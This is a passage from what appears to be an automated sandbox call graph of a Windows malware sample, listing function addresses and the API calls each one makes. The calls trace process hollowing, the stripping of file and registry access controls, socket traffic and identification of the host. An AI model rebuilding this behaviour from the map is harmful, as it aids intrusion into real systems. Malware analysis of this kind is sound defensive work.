API calls 6828->6829 6830 251ea1e 6829->6830 6831 251ec2e codecvt 4 API calls 6830->6831 6831->6827 6833 251dd05 6 API calls 6832->6833 6834 251df51 6833->6834 6835 251f04e 4 API calls 6834->6835 6836 251df58 6835->6836 6837 251de24 10 API calls 6836->6837 6838 251df63 6837->6838 6838->6823 6840 2511ae2 GetProcAddress 6839->6840 6841 2511b68 GetComputerNameA GetVolumeInformationA 6839->6841 6840->6841 6844 2511af5 6840->6844 6841->6780 6842 2511b1c GetAdaptersAddresses 6842->6844 6846 2511b29 6842->6846 6843 251ebed 8 API calls 6843->6844 6844->6842 6844->6843 6844->6846 6845 251ec2e codecvt 4 API calls 6845->6841 6846->6841 6846->6845 6846->6846 6848 2516ec3 2 API calls 6847->6848 6849 2517ef4 6848->6849 6859 2517fc9 6849->6859 6883 25173ff 6849->6883 6851 2517f16 6851->6859 6903 2517809 GetUserNameA 6851->6903 6853 2517f63 6853->6859 6927 251ef1e lstrlenA 6853->6927 6856 251ef1e lstrlenA 6857 2517fb7 6856->6857 6929 2517a95 RegOpenKeyExA 6857->6929 6859->6348 6861 2517073 6860->6861 6862 25170b9 RegOpenKeyExA 6861->6862 6863 25170d0 6862->6863 6877 25171b8 6862->6877 6864 2516dc2 6 API calls 6863->6864 6867 25170d5 6864->6867 6865 251719b RegEnumValueA 6866 25171af RegCloseKey 6865->6866 6865->6867 6866->6877 6867->6865 6869 25171d0 6867->6869 6960 251f1a5 lstrlenA 6867->6960 6870 2517205 RegCloseKey 6869->6870 6871 2517227 6869->6871 6870->6877 6872 25172b8 ___ascii_stricmp 6871->6872 6873 251728e RegCloseKey 6871->6873 6874 25172cd RegCloseKey 6872->6874 6875 25172dd 6872->6875 6873->6877 6874->6877 6876 2517311 RegCloseKey 6875->6876 6879 2517335 6875->6879 6876->6877 6877->6347 6878 25173d5 RegCloseKey 6880 25173e4 6878->6880 6879->6878 6881 251737e GetFileAttributesExA 6879->6881 6882 2517397 6879->6882 6881->6882 6882->6878 6884 251741b 6883->6884 6885 2516dc2 6 API calls 6884->6885 6886 251743f 6885->6886 6887 2517469 RegOpenKeyExA 6886->6887 6888 25177f9 6887->6888 6899 2517487 ___ascii_stricmp 6887->6899 6888->6851 6889 2517703 RegEnumKeyA 6890 2517714 RegCloseKey 6889->6890 6889->6899 6890->6888 6891 251f1a5 lstrlenA 6891->6899 6892 25174d2 RegOpenKeyExA 6892->6899 6893 251772c 6895 2517742 RegCloseKey 6893->6895 6896 251774b 6893->6896 6894 2517521 RegQueryValueExA 6894->6899 6895->6896 6897 25177ec RegCloseKey 6896->6897 6897->6888 6898 25176e4 RegCloseKey 6898->6899 6899->6889 6899->6891 6899->6892 6899->6893 6899->6894 6899->6898 6900 2517769 6899->6900 6902 251777e GetFileAttributesExA 6899->6902 6901 25177e3 RegCloseKey 6900->6901 6901->6897 6902->6900 6904 251783d LookupAccountNameA 6903->6904 6905 2517a8d 6903->6905 6904->6905 6906 2517874 GetLengthSid GetFileSecurityA 6904->6906 6905->6853 6906->6905 6907 25178a8 GetSecurityDescriptorOwner 6906->6907 6908 25178c5 EqualSid 6907->6908 6909 251791d GetSecurityDescriptorDacl 6907->6909 6908->6909 6910 25178dc LocalAlloc 6908->6910 6909->6905 6916 2517941 6909->6916 6910->6909 6911 25178ef InitializeSecurityDescriptor 6910->6911 6912 2517916 LocalFree 6911->6912 6913 25178fb SetSecurityDescriptorOwner 6911->6913 6912->6909 6913->6912 6915 251790b SetFileSecurityA 6913->6915 6914 251795b GetAce 6914->6916 6915->6912 6916->6905 6916->6914 6917 2517980 EqualSid 6916->6917 6918 25179be EqualSid 6916->6918 6919 2517a3d 6916->6919 6921 251799d DeleteAce 6916->6921 6917->6916 6918->6916 6919->6905 6920 2517a43 LocalAlloc 6919->6920 6920->6905 6922 2517a56 InitializeSecurityDescriptor 6920->6922 6921->6916 6923 2517a62 SetSecurityDescriptorDacl 6922->6923 6924 2517a86 LocalFree 6922->6924 6923->6924 6925 2517a73 SetFileSecurityA 6923->6925 6924->6905 6925->6924 6926 2517a83 6925->6926 6926->6924 6928 2517fa6 6927->6928 6928->6856 6930 2517ac4 6929->6930 6931 2517acb GetUserNameA 6929->6931 6930->6859 6932 2517da7 RegCloseKey 6931->6932 6933 2517aed LookupAccountNameA 6931->6933 6932->6930 6933->6932 6934 2517b24 RegGetKeySecurity 6933->6934 6934->6932 6935 2517b49 GetSecurityDescriptorOwner 6934->6935 6936 2517b63 EqualSid 6935->6936 6937 2517bb8 GetSecurityDescriptorDacl 6935->6937 6936->6937 6938 2517b74 LocalAlloc 6936->6938 6939 2517da6 6937->6939 6946 2517bdc 6937->6946 6938->6937 6940 2517b8a InitializeSecurityDescriptor 6938->6940 6939->6932 6941 2517bb1 LocalFree 6940->6941 6942 2517b96 SetSecurityDescriptorOwner 6940->6942 6941->6937 6942->6941 6944 2517ba6 RegSetKeySecurity 6942->6944 6943 2517bf8 GetAce 6943->6946 6944->6941 6945 2517c1d EqualSid 6945->6946 6946->6939 6946->6943 6946->6945 6947 2517cd9 6946->6947 6948 2517c5f EqualSid 6946->6948 6949 2517c3a DeleteAce 6946->6949 6947->6939 6950 2517d5a LocalAlloc 6947->6950 6951 2517cf2 RegOpenKeyExA 6947->6951 6948->6946 6949->6946 6950->6939 6952 2517d70 InitializeSecurityDescriptor 6950->6952 6951->6950 6957 2517d0f 6951->6957 6953 2517d7c SetSecurityDescriptorDacl 6952->6953 6954 2517d9f LocalFree 6952->6954 6953->6954 6955 2517d8c RegSetKeySecurity 6953->6955 6954->6939 6955->6954 6956 2517d9c 6955->6956 6956->6954 6958 2517d43 RegSetValueExA 6957->6958 6958->6950 6959 2517d54 6958->6959 6959->6950 6961 251f1c3 6960->6961 6961->6867 6963 251dd05 6 API calls 6962->6963 6966 251e65f 6963->6966 6964 251e6a5 6965 251ebcc 4 API calls 6964->6965 6972 251e6f5 6964->6972 6969 251e6b0 6965->6969 6966->6964 6968 251e68c lstrcmpA 6966->6968 6967 251e6b7 6967->6370 6968->6966 6969->6967 6971 251e6e0 lstrcpynA 6969->6971 6969->6972 6970 251e71d lstrcmpA 6970->6972 6971->6972 6972->6967 6972->6970 6974 2512692 inet_addr 6973->6974 6975 251268e 6973->6975 6974->6975 6976 251269e gethostbyname 6974->6976 6977 251f428 6975->6977 6976->6975 7125 251f315 6977->7125 6980 251f43e 6981 251f473 recv 6980->6981 6982 251f458 6981->6982 6983 251f47c 6981->6983 6982->6981 6982->6983 6983->6407 6985 251c525 6984->6985 6986 251c532 6984->6986 6985->6986 6988 251ec2e codecvt 4 API calls 6985->6988 6987 251c548 6986->6987 7138 251e7ff 6986->7138 6990 251e7ff lstrcmpiA 6987->6990 6996 251c54f 6987->6996 6988->6986 6991 251c615 6990->6991 6992 251ebcc 4 API calls 6991->6992 6991->6996 6992->6996 6993 251c5d1 6995 251ebcc 4 API calls 6993->6995 6995->6996 6996->6389 6997 251e819 11 API calls 6998 251c5b7 6997->6998 6999 251f04e 4 API calls 6998->6999 7000 251c5bf 6999->7000 7000->6987 7000->6993 7003 251c8d2 7001->7003 7002 251c907 7002->6391 7003->7002 7004 251c517 23 API calls 7003->7004 7004->7002 7006 251c670 7005->7006 7007 251c67d 7005->7007 7008 251ebcc 4 API calls 7006->7008 7009 251ebcc 4 API calls 7007->7009 7010 251c699 7007->7010 7008->7007 7009->7010 7011 251c6f3 7010->7011 7012 251c73c send 7010->7012 7011->6420 7011->6485 7012->7011 7014 251c770 7013->7014 7015 251c77d 7013->7015 7016 251ebcc 4 API calls 7014->7016 7017 251c799 7015->7017 7018 251ebcc 4 API calls 7015->7018 7016->7015 7019 251c7b5 7017->7019 7021 251ebcc 4 API calls 7017->7021 7018->7017 7020 251f43e recv 7019->7020 7022 251c7cb 7020->7022 7021->7019 7023 251c7d3 7022->7023 7024 251f43e recv 7022->7024 7023->6485 7024->7023 7141 2517db7 7025->7141 7028 251f04e 4 API calls 7031 2517e4c 7028->7031 7029 2517e96 7029->6485 7030 2517e70 7030->7029 7032 251f04e 4 API calls 7030->7032 7031->7030 7033 251f04e 4 API calls 7031->7033 7032->7029 7033->7030 7035 2516ec3 2 API calls 7034->7035 7036 2517fdd 7035->7036 7037 25180c2 CreateProcessA 7036->7037 7038 25173ff 17 API calls 7036->7038 7037->6473 7037->6474 7039 2517fff 7038->7039 7039->7037 7040 2517809 21 API calls 7039->7040 7041 251804d 7040->7041 7041->7037 7042 251ef1e lstrlenA 7041->7042 7043 251809e 7042->7043 7044 251ef1e lstrlenA 7043->7044 7045 25180af 7044->7045 7046 2517a95 24 API calls 7045->7046 7046->7037 7048 2517db7 2 API calls 7047->7048 7049 2517eb8 7048->7049 7050 251f04e 4 API calls 7049->7050 7051 2517ece DeleteFileA 7050->7051 7051->6485 7053 251dd05 6 API calls 7052->7053 7054 251e31d 7053->7054 7145 251e177 7054->7145 7056 251e326 7056->6446 7058 25131f3 7057->7058 7068 25131ec 7057->7068 7059 251ebcc 4 API calls 7058->7059 7066 25131fc 7059->7066 7060 2513459 7063 251f04e 4 API calls 7060->7063 7061 251349d 7062 251ec2e codecvt 4 API calls 7061->7062 7062->7068 7064 251345f 7063->7064 7065 25130fa 4 API calls 7064->7065 7065->7068 7067 251ebcc GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 7066->7067 7066->7068 7069 251344d 7066->7069 7072 251344b 7066->7072 7073 2513141 lstrcmpiA 7066->7073 7171 25130fa GetTickCount 7066->7171 7067->7066 7068->6485 7070 251ec2e codecvt 4 API calls 7069->7070 7070->7072 7072->7060 7072->7061 7073->7066 7075 25130fa 4 API calls 7074->7075 7076 2513c1a 7075->7076 7077 2513ce6 7076->7077 7176 2513a72 7076->7176 7077->6485 7080 2513a72 9 API calls 7082 2513c5e 7080->7082 7081 2513a72 9 API calls 7081->7082 7082->7077 7082->7081 7083 251ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 7082->7083 7083->7082 7085 2513a10 7084->7085 7086 25130fa 4 API calls 7085->7086 7087 2513a1a 7086->7087 7087->6485 7089 251dd05 6 API calls 7088->7089 7090 251e7be 7089->7090 7090->6485 7092 251c105 7091->7092 7093 251c07e wsprintfA 7091->7093 7092->6485 7185 251bfce 7093->7185 7095 251c0ef 7096 251bfce wsprintfA 7095->7096 7096->7092 7098 2517047 7097->7098 7099 2516f88 LookupAccountNameA 7097->7099 7098->6485 7101 2517025 7099->7101 7102 2516fcb 7099->7102 7187 2516edd 7101->7187 7104 2516fdb ConvertSidToStringSidA 7102->7104 7104->7101 7106 2516ff1 7104->7106 7107 2517013 LocalFree 7106->7107 7107->7101 7109 251dd05 6 API calls 7108->7109 7110 251e85c 7109->7110 7111 251dd84 lstrcmpiA 7110->7111 7112 251e867 7111->7112 7113 251e885 lstrcpyA 7112->7113 7198 25124a5 7112->7198 7201 251dd69 7113->7201 7119 2517db7 2 API calls 7118->7119 7120 2517de1 7119->7120 7121 251f04e 4 API calls 7120->7121 7124 2517e16 7120->7124 7122 2517df2 7121->7122 7123 251f04e 4 API calls 7122->7123 7122->7124 7123->7124 7124->6485 7126 251ca1d 7125->7126 7127 251f33b 7125->7127 7126->6404 7126->6980 7128 251f347 htons socket 7127->7128 7129 251f382 ioctlsocket 7128->7129 7130 251f374 closesocket 7128->7130 7131 251f3aa connect select 7129->7131 7132 251f39d 7129->7132 7130->7126 7131->7126 7134 251f3f2 __WSAFDIsSet 7131->7134 7133 251f39f closesocket 7132->7133 7133->7126 7134->7133 7135 251f403 ioctlsocket 7134->7135 7137 251f26d setsockopt setsockopt setsockopt setsockopt setsockopt 7135->7137 7137->7126 7139 251dd84 lstrcmpiA 7138->7139 7140 251c58e 7139->7140 7140->6987 7140->6993 7140->6997 7142 2517dc8 InterlockedExchange 7141->7142 7143 2517dc0 Sleep 7142->7143 7144 2517dd4 7142->7144 7143->7142 7144->7028 7144->7030 7146 251e184 7145->7146 7147 251e2e4 7146->7147 7148 251e223 7146->7148 7161 251dfe2 7146->7161 7147->7056 7148->7147 7150 251dfe2 8 API calls 7148->7150 7155 251e23c 7150->7155 7151 251e1be 7151->7148 7152 251dbcf 3 API calls 7151->7152 7154 251e1d6 7152->7154 7153 251e21a CloseHandle 7153->7148 7154->7148 7154->7153 7156 251e1f9 WriteFile 7154->7156 7155->7147 7165 251e095 RegCreateKeyExA 7155->7165 7156->7153 7158 251e213 7156->7158 7158->7153 7159 251e2a3 7159->7147 7160 251e095 4 API calls 7159->7160 7160->7147 7162 251dffc 7161->7162 7164 251e024 7161->7164 7163 251db2e 8 API calls 7162->7163 7162->7164 7163->7164 7164->7151 7166 251e172 7165->7166 7168 251e0c0 7165->7168 7166->7159 7167 251e13d 7169 251e14e RegDeleteValueA RegCloseKey 7167->7169 7168->7167 7170 251e115 RegSetValueExA 7168->7170 7169->7166 7170->7167 7170->7168 7172 2513122 InterlockedExchange 7171->7172 7173 251310f GetTickCount 7172->7173 7174 251312e 7172->7174 7173->7174 7175 251311a Sleep 7173->7175 7174->7066 7175->7172 7177 251f04e 4 API calls 7176->7177 7178 2513a83 7177->7178 7182 2513bc0 7178->7182 7183 2513b66 lstrlenA 7178->7183 7184 2513ac1 7178->7184 7179 2513be6 7181 251ec2e codecvt 4 API calls 7179->7181 7180 251ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 7180->7182 7181->7184 7182->7179 7182->7180 7183->7178 7183->7184 7184->7077 7184->7080 7186 251bfd6 wsprintfA 7185->7186 7186->7095 7188 2516f55 wsprintfA 7187->7188 7189 2516eef AllocateAndInitializeSid 7187->7189 7188->7098 7190 2516f44 7189->7190 7191 2516f1c CheckTokenMembership 7189->7191 7190->7188 7195 2516e36 GetUserNameW 7190->7195 7192 2516f3b FreeSid 7191->7192 7193 2516f2e 7191->7193 7192->7190 7193->7192 7196 2516e5f LookupAccountNameW 7195->7196 7197 2516e97 7195->7197 7196->7197 7197->7188 7199 2512419 4 API calls 7198->7199 7200 25124b6 7199->7200 7200->7113 7202 251dd79 lstrlenA 7201->7202 7202->6485 7204 251eb17 7203->7204 7206 251eb21 7203->7206 7205 251eae4 2 API calls 7204->7205 7205->7206 7206->6531 7209 25169b9 WriteFile 7207->7209 7210 25169ff 7209->7210 7211 2516a3c 7209->7211 7210->7211 7212 2516a10 WriteFile 7210->7212 7211->6527 7211->6528 7212->7210 7212->7211 7214 2513ee2 7213->7214 7215 2513edc 7213->7215 7214->6542 7216 2516dc2 6 API calls 7215->7216 7216->7214 7218 251400b CreateFileA 7217->7218 7219 2514052 7218->7219 7220 251402c GetLastError 7218->7220 7219->6545 7220->7219 7221 2514037 7220->7221 7221->7219 7222 2514041 Sleep 7221->7222 7222->7218 7222->7219 7224 2513f4e GetLastError 7223->7224 7226 2513f7c 7223->7226 7225 2513f5b WaitForSingleObject GetOverlappedResult 7224->7225 7224->7226 7225->7226 7227 2513f8c ReadFile 7226->7227 7228 2513fc2 GetLastError 7227->7228 7230 2513ff0 7227->7230 7229 2513fcf WaitForSingleObject GetOverlappedResult 7228->7229 7228->7230 7229->7230 7230->6550 7230->6551 7232 2511924 GetVersionExA 7231->7232 7232->6590 7234 251f0f1 7233->7234 7235 251f0ed 7233->7235 7236 251f119 7234->7236 7237 251f0fa lstrlenA SysAllocStringByteLen 7234->7237 7235->6622 7239 251f11c MultiByteToWideChar 7236->7239 7238 251f117 7237->7238 7237->7239 7238->6622 7239->7238 7241 2511820 17 API calls 7240->7241 7243 25118f2 7241->7243 7242 25118f9 7242->6616 7243->7242 7257 2511280 7243->7257 7245 2511908 7245->6616 7270 2511000 7246->7270 7248 2511839 7249 2511851 GetCurrentProcess 7248->7249 7250 251183d 7248->7250 7251 2511864 7249->7251 7250->6609 7251->6609 7253 2519308 7252->7253 7255 251920e 7252->7255 7253->6616 7254 25192f1 Sleep 7254->7255 7255->7253 7255->7254 7255->7255 7256 25192bf ShellExecuteA 7255->7256 7256->7253 7256->7255 7259 25112e1 7257->7259 7258 2511373 ShellExecuteExW 7260 25116f9 GetLastError 7258->7260 7266 25113a8 7258->7266 7259->7258 7259->7259 7269 2511699 7260->7269 7261 2511570 lstrlenW 7261->7266 7262 25115be GetStartupInfoW 7262->7266 7263 25115ff CreateProcessWithLogonW 7264 25116bf GetLastError 7263->7264 7265 251163f WaitForSingleObject 7263->7265 7264->7269 7265->7266 7267 2511659 CloseHandle 7265->7267 7266->7261 7266->7262 7266->7263 7268 2511668 CloseHandle 7266->7268 7266->7269 7267->7266 7268->7266 7269->7245 7271 251100d LoadLibraryA 7270->7271 7287 2511023 7270->7287 7272 2511021 7271->7272 7271->7287 7272->7248 7273 25110b5 GetProcAddress 7274 25110d1 GetProcAddress 7273->7274 7275 251127b 7273->7275 7274->7275 7276 25110f0 GetProcAddress 7274->7276 7275->7248 7276->7275 7277 2511110 GetProcAddress 7276->7277 7277->7275 7278 2511130 GetProcAddress 7277->7278 7278->7275 7279 251114f GetProcAddress 7278->7279 7279->7275 7280 251116f GetProcAddress 7279->7280 7280->7275 7281 251118f GetProcAddress 7280->7281 7281->7275 7282 25111ae GetProcAddress 7281->7282 7282->7275 7283 25111ce GetProcAddress 7282->7283 7283->7275 7284 25111ee GetProcAddress 7283->7284 7284->7275 7285 2511209 GetProcAddress 7284->7285 7285->7275 7286 2511225 GetProcAddress 7285->7286 7286->7275 7288 2511241 GetProcAddress 7286->7288 7287->7273 7290 25110ae 7287->7290 7288->7275 7289 251125c GetProcAddress 7288->7289 7289->7275 7290->7248 7292 251908d 7291->7292 7293 25190e2 wsprintfA 7292->7293 7294 251ee2a 7293->7294 7295 25190fd CreateFileA 7294->7295 7296 251911a lstrlenA WriteFile CloseHandle 7295->7296 7297 251913f 7295->7297 7296->7297 7297->6645 7297->6646 7299 251ee2a 7298->7299 7300 2519794 CreateProcessA 7299->7300 7301 25197c2 7300->7301 7302 25197bb 7300->7302 7303 25197d4 GetThreadContext 7301->7303 7302->6657 7304 2519801 7303->7304 7305 25197f5 7303->7305 7312 251637c 7304->7312 7306 25197f6 TerminateProcess 7305->7306 7306->7302 7308 2519816 7308->7306 7309 251981e WriteProcessMemory 7308->7309 7309->7305 7310 251983b SetThreadContext 7309->7310 7310->7305 7311 2519858 ResumeThread 7310->7311 7311->7302 7313 2516386 7312->7313 7314 251638a GetModuleHandleA VirtualAlloc 7312->7314 7313->7308 7315 25163f5 7314->7315 7316 25163b6 7314->7316 7315->7308 7317 25163be VirtualAllocEx 7316->7317 7317->7315 7318 25163d6 7317->7318 7319 25163df WriteProcessMemory 7318->7319 7319->7315 7321 2518791 7320->7321 7322 251879f 7320->7322 7323 251f04e 4 API calls 7321->7323 7324 25187bc 7322->7324 7325 251f04e 4 API calls 7322->7325 7323->7322 7326 251e819 11 API calls 7324->7326 7325->7324 7327 25187d7 7326->7327 7339 2518803 7327->7339 7466 25126b2 gethostbyaddr 7327->7466 7330 25187eb 7331 251e8a1 30 API calls 7330->7331 7330->7339 7331->7339 7334 251e819 11 API calls 7334->7339 7335 25188a0 Sleep 7335->7339 7336 251f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 7336->7339 7338 25126b2 2 API calls 7338->7339 7339->7334 7339->7335 7339->7336 7339->7338 7340 251e8a1 30 API calls 7339->7340 7371 251c4d6 7339->7371 7374 251c4e2 7339->7374 7377 2512011 7339->7377 7412 2518328 7339->7412 7340->7339 7342 2514084 7341->7342 7343 251407d 7341->7343 7344 2513ecd 6 API calls 7342->7344 7345 251408f 7344->7345 7346 2514000 3 API calls 7345->7346 7347 2514095 7346->7347 7348 2514130 7347->7348 7349 25140c0 7347->7349 7350 2513ecd 6 API calls 7348->7350 7354 2513f18 4 API calls 7349->7354 7351 2514159 CreateNamedPipeA 7350->7351 7352 2514167 Sleep 7351->7352 7353 2514188 ConnectNamedPipe 7351->7353 7352->7348 7356 2514176 CloseHandle 7352->7356 7355 2514195 GetLastError 7353->7355 7367 25141ab 7353->7367 7357 25140da 7354->7357 7358 251425e DisconnectNamedPipe 7355->7358 7355->7367 7356->7353 7359 2513f8c 4 API calls 7357->7359 7358->7353 7360 25140ec 7359->7360 7361 2514127 CloseHandle 7360->7361 7362 2514101 7360->7362 7361->7348 7364 2513f18 4 API calls 7362->7364 7363 2513f18 WriteFile GetLastError WaitForSingleObject GetOverlappedResult 7363->7367 7365 251411c ExitProcess 7364->7365 7366 2513f8c ReadFile GetLastError WaitForSingleObject GetOverlappedResult 7366->7367 7367->7353 7367->7358 7367->7363 7367->7366 7368 251426a CloseHandle CloseHandle 7367->7368 7369 251e318 23 API calls 7368->7369 7370 251427b 7369->7370 7370->7370 7471 251c2dc 7371->7471 7375 251c2dc 135 API calls 7374->7375 7376 251c4ec 7375->7376 7376->7339 7378 2512020 7377->7378 7379 251202e 7377->7379 7380 251f04e 4 API calls 7378->7380 7381 251204b 7379->7381 7383 251f04e 4 API calls 7379->7383 7380->7379 7382 251206e GetTickCount 7381->7382 7384 251f04e 4 API calls 7381->7384 7385 25120db GetTickCount 7382->7385 7394 2512090 7382->7394 7383->7381 7387 2512068 7384->7387 7386 2512132 GetTickCount GetTickCount 7385->7386 7396 25120e7 7385->7396 7390 251f04e 4 API calls 7386->7390 7387->7382 7388 25120d4 GetTickCount 7388->7385 7389 251212b GetTickCount 7389->7386 7392 2512159 7390->7392 7391 2512684 2 API calls 7391->7394 7395 251e854 13 API calls 7392->7395 7405 25121b4 7392->7405 7394->7388 7394->7391 7403 25120ce 7394->7403 7801 2511978 7394->7801 7398 251218e 7395->7398 7396->7389 7402 2511978 15 API calls 7396->7402 7407 2512125 7396->7407 7791 2512ef8 7396->7791 7397 251f04e 4 API calls 7400 25121d1 7397->7400 7401 251e819 11 API calls 7398->7401 7404 251ea84 30 API calls 7400->7404 7410 25121f2 7400->7410 7406 251219c 7401->7406 7402->7396 7403->7388 7408 25121ec 7404->7408 7405->7397 7406->7405 7806 2511c5f 7406->7806 7407->7389 7409 251f04e 4 API calls 7408->7409 7409->7410 7410->7339 7413 2517dd6 6 API calls 7412->7413 7414 251833c 7413->7414 7415 2516ec3 2 API calls 7414->7415 7442 2518340 7414->7442 7416 251834f 7415->7416 7417 251835c 7416->7417 7421 251846b 7416->7421 7418 25173ff 17 API calls 7417->7418 7443 2518373 7418->7443 7419 25185df 7422 2518626 GetTempPathA 7419->7422 7433 2518768 7419->7433 7438 2518671 7419->7438 7420 251675c 21 API calls 7420->7419 7423 25184a7 RegOpenKeyExA 7421->7423 7448 2518450 7421->7448 7434 2518638 7422->7434 7425 25184c0 RegQueryValueExA 7423->7425 7426 251852f 7423->7426 7428 2518521 RegCloseKey 7425->7428 7429 25184dd 7425->7429 7431 2518564 RegOpenKeyExA 7426->7431 7436 25185a5 7426->7436 7427 25186ad 7430 2518762 7427->7430 7432 2517e2f 6 API calls 7427->7432 7428->7426 7429->7428 7439 251ebcc 4 API calls 7429->7439 7430->7433 7435 2518573 RegSetValueExA RegCloseKey 7431->7435 7431->7436 7437 25186bb 7432->7437 7441 251ec2e codecvt 4 API calls 7433->7441 7433->7442 7434->7438 7435->7436 7436->7448 7451 251ec2e codecvt 4 API calls 7436->7451 7440 251875b DeleteFileA 7437->7440 7452 25186e0 lstrcpyA lstrlenA 7437->7452 7878 2516ba7 IsBadCodePtr 7438->7878 7445 25184f0 7439->7445 7440->7430 7441->7442 7442->7339 7443->7442 7446 25183ea RegOpenKeyExA 7443->7446 7443->7448 7445->7428 7447 25184f8 RegQueryValueExA 7445->7447 7446->7448 7449 25183fd RegQueryValueExA 7446->7449 7447->7428 7450 2518515 7447->7450 7448->7419 7448->7420 7453 251842d RegSetValueExA 7449->7453 7454 251841e 7449->7454 7455 251ec2e codecvt 4 API calls 7450->7455 7451->7448 7456 2517fcf 64 API calls 7452->7456 7457 2518447 RegCloseKey 7453->7457 7454->7453 7454->7457 7458 251851d 7455->7458 7459 2518719 CreateProcessA 7456->7459 7457->7448 7458->7428 7460 251873d CloseHandle CloseHandle 7459->7460 7461 251874f 7459->7461 7460->7433 7462 2517ee6 64 API calls 7461->7462 7463 2518754 7462->7463 7464 2517ead 6 API calls 7463->7464 7465 251875a 7464->7465 7465->7440 7467 25126fb 7466->7467 7468 25126cd 7466->7468 7467->7330 7469 25126e1 inet_ntoa 7468->7469 7470 25126de 7468->7470 7469->7470 7470->7330 7486 251a4c7 GetTickCount 7471->7486 7474 251c47a 7479 251c4d2 7474->7479 7480 251c4ab InterlockedIncrement CreateThread 7474->7480 7475 251c300 GetTickCount 7477 251c337 7475->7477 7476 251c326 7476->7477 7478 251c32b GetTickCount 7476->7478 7477->7474 7481 251c363 GetTickCount 7477->7481 7478->7477 7479->7339 7480->7479 7482 251c4cb CloseHandle 7480->7482 7491 251b535 7480->7491 7481->7474 7483 251c373 7481->7483 7482->7479 7484 251c378 GetTickCount 7483->7484 7485 251c37f 7483->7485 7484->7485 7485->7474 7487 251a4f7 InterlockedExchange 7486->7487 7488 251a500 7487->7488 7489 251a4e4 GetTickCount 7487->7489 7488->7474 7488->7475 7488->7476 7489->7488 7490 251a4ef Sleep 7489->7490 7490->7487 7492 251b566 7491->7492 7493 251ebcc 4 API calls 7492->7493 7494 251b587 7493->7494 7495 251ebcc 4 API calls 7494->7495 7539 251b590 7495->7539 7496 251bdcd InterlockedDecrement 7497 251bde2 7496->7497 7499 251ec2e codecvt 4 API calls 7497->7499 7500 251bdea 7499->7500 7501 251ec2e codecvt 4 API calls 7500->7501 7503 251bdf2 7501->7503 7502 251bdb7 Sleep 7502->7539 7504 251be05 7503->7504 7506 251ec2e codecvt 4 API calls 7503->7506 7505 251bdcc 7505->7496 7506->7504 7507 251ebed 8 API calls 7507->7539 7510 251b6b6 lstrlenA 7510->7539 7511 25130b5 2 API calls 7511->7539 7512 251e819 11 API calls 7512->7539 7513 251b6ed lstrcpyA 7559 2515ce1 7513->7559 7516 251b731 lstrlenA 7516->7539 7517 251b71f lstrcmpA 7517->7516 7517->7539 7518 251bd49 InterlockedIncrement 7647 251a628 7518->7647 7521 251b7ce InterlockedIncrement 7569 251acd7 7521->7569 7522 251bc5b InterlockedIncrement 7522->7539 7524 251b826 InterlockedIncrement 7524->7539 7525 2515ce1 22 API calls 7525->7539 7526 251bcdc closesocket 7526->7539 7527 25138f0 6 API calls 7527->7539 7528 251bc6d InterlockedIncrement 7528->7539 7529 251ab81 lstrcpynA InterlockedIncrement 7529->7539 7530 251bba6 InterlockedIncrement 7530->7539 7532 251bc4c closesocket 7532->7539 7534 251ba71 wsprintfA 7586 251a7c1 7534->7586 7537 251a7c1 22 API calls 7537->7539 7538 251ef1e lstrlenA 7538->7539 7539->7496 7539->7502 7539->7505 7539->7507 7539->7510 7539->7511 7539->7512 7539->7513 7539->7516 7539->7517 7539->7518 7539->7521 7539->7522 7539->7524 7539->7525 7539->7526 7539->7527 7539->7528 7539->7529 7539->7530 7539->7532 7539->7534 7539->7537 7539->7538 7540 2515ded 12 API calls 7539->7540 7541 2513e10 7539->7541 7544 2513e4f 7539->7544 7547 251384f 7539->7547 7567 251a7a3 inet_ntoa 7539->7567 7574 251abee 7539->7574 7606 2513cfb 7539->7606 7609 251b3c5 7539->7609 7640 251a51d 7539->7640 7540->7539 7542 25130fa 4 API calls 7541->7542 7543 2513e1d 7542->7543 7543->7539 7545 25130fa 4 API calls 7544->7545 7546 2513e5c 7545->7546 7546->7539 7548 25130fa 4 API calls 7547->7548 7550 2513863 7548->7550 7549 25138b2 7549->7539 7550->7549 7551 25138b9 7550->7551 7552 2513889 7550->7552 7656 25135f9 7551->7656 7650 2513718 7552->7650 7557 25135f9 6 API calls 7557->7549 7558 2513718 6 API calls 7558->7549 7560 2515cf4 7559->7560 7561 2515cec 7559->7561 7563 2514bd1 4 API calls 7560->7563 7662 2514bd1 GetTickCount 7561->7662 7564 2515d02 7563->7564 7667 2515472 7564->7667 7568 251a7b9 7567->7568 7568->7539 7570 251f315 14 API calls 7569->7570 7571 251aceb 7570->7571 7572 251acff 7571->7572 7573 251f315 14 API calls 7571->7573 7572->7539 7573->7572 7575 251abfb 7574->7575 7578 251ac65 7575->7578 7730 2512f22 7575->7730 7577 251f315 14 API calls 7577->7578 7578->7577 7579 251ac6f 7578->7579 7585 251ac8a 7578->7585 7738 251ab81 7579->7738 7581 2512684 2 API calls 7583 251ac23 7581->7583 7583->7578 7583->7581 7585->7539 7587 251a87d lstrlenA send 7586->7587 7588 251a7df 7586->7588 7590 251a899 7587->7590 7591 251a8bf 7587->7591 7588->7587 7589 251a8f2 7588->7589 7595 251a7fa wsprintfA 7588->7595 7598 251a80a 7588->7598 7594 251a978 recv 7589->7594 7597 251a9b0 wsprintfA 7589->7597 7599 251a982 7589->7599 7592 251a8a5 wsprintfA 7590->7592 7605 251a89e 7590->7605 7591->7589 7593 251a8c4 send 7591->7593 7592->7605 7593->7589 7596 251a8d8 wsprintfA 7593->7596 7594->7589 7594->7599 7595->7598 7596->7605 7597->7605 7598->7587 7600 25130b5 2 API calls 7599->7600 7599->7605 7601 251ab05 7600->7601 7602 251e819 11 API calls 7601->7602 7603 251ab17 7602->7603 7604 251a7a3 inet_ntoa 7603->7604 7604->7605 7605->7539 7607 25130fa 4 API calls 7606->7607 7608 2513d0b 7607->7608 7608->7539 7610 2515ce1 22 API calls 7609->7610 7611 251b3e6 7610->7611 7612 2515ce1 22 API calls 7611->7612 7614 251b404 7612->7614 7613 251b440 7615 251ef7c 3 API calls 7613->7615 7614->7613 7616 251ef7c 3 API calls 7614->7616 7617 251b458 wsprintfA 7615->7617 7618 251b42b 7616->7618 7620 251ef7c 3 API calls 7617->7620 7619 251ef7c 3 API calls 7618->7619 7619->7613 7621 251b480 7620->7621 7622 251ef7c 3 API calls 